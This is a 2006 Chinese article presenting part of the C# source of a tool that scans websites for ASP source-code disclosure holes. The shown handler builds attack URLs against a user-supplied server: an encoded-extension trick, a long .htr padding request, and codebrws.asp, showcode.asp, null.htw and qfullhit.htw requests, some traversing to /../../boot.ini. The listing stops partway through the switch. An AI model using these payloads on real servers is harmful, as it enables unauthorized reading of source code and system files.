一个用c#写的扫描asp源码漏洞的应用程序(续)

作者：佚名 文章来源：不详 点击数： 更新时间：2006-6-15

//主要方法

protected void btnGo_Click (object sender, System.EventArgs e)

{

//解析url

string strServer = this.txtServer.Text ;

string strUrl = this.txtFileName.Text ;

char [] point = {'.'} ; //定义分割符为"."

char[] line = {'/'} ; //定义分割符为"."

string [] arrString = strUrl.Split(line) ;

//求asp文件全名

string strFileName = arrString[arrString.Length - 1] ;

//求从根目录下的路径

string strPath = strUrl.Substring( 0 ,

strUrl.Length - strFileName.Length) ;

//解析文件全名

arrString = strFileName.Split(point) ;

//求文件扩展名

string strLast = arrString[arrString.Length - 1] ;

//求文件名

string strFirst = strFileName.Substring( 0 ,

strFileName.Length - strLast.Length - 1) ;

//使按钮、输入框等失效

this.txtServer.ReadOnly = true ;

this.txtFileName.ReadOnly = true ;

this.btnClear.Enabled = false ;

this.btnGo.Enabled = false ;

if (this.txtServer.Text == "http://" || this.txtFileName.Text == ""

|| this.txtServer.Text.Trim()== "" ||

this.txtServer.Text.Substring(0,7) != "http://")

{

MessageBox.Show("请输入正确的主机名和文件名！") ;

this.txtServer.Focus() ;

}

else

{

this.txtResult.Visible = true ;

this.txtResult.ReadOnly = true ;

this.barStatus.Text = "正在连结主机…" ;

string strRequestFile ;

switch (this.cboMethod.SelectedIndex)

{

case 0: //直接读取

strRequestFile = strServer + strUrl ;

break ;

case 5 : //%2e%41sp

strRequestFile = strServer + strPath + strFirst

+ "%2e%41sp" ;

break ;

case 8 : //longhtr

strRequestFile = strServer + strUrl

+ "+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"

+ "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"

+ "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htr" ;

break ;

case 10: //codebrws.asp

strRequestFile = strServer + "/iissamples/exair/howitworks/codebrws.asp?source="

+ strUrl ;

break ;

case 11: //showcode.asp

strRequestFile = strServer + "/iissamples/exair/howitworks/codebrws.asp?source="

+ "/msadc/../../../../boot.ini" ;

break;

case 12 : //null.htw

strRequestFile = strServer + "/null.htw?CiWebHitsFile="

+ strUrl + "%20&CiRestriction=none&CiHiliteType=Full" ;

break ;

case 13 : //qfullhit.htw

strRequestFile = strServer + "/iissamples/issamples/oop/qfullhit.htw?"

+ "CiWebHitsFile=/../../boot.ini&CiRestriction=none"

+ "&CiHiliteType=Full";

break ;